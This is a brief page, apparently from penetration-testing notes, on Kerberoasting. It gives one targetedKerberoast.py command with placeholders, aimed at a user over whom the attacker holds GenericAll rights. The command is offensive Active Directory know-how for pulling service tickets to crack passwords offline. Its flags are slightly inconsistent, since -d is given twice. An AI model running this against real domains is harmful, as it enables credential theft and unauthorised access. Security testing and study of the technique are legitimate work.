Kerberoasting

Basics

Targeted Kerberoasting

Works when users is having GenericAll Relation to another user

python3 ./targetedKerberoast.py -v -d <DC_IP> -u <USER> -p <PASSWORD> -d <DOMAIN> --request-user <TARGET_USERNAME>

Last updated

Was this helpful?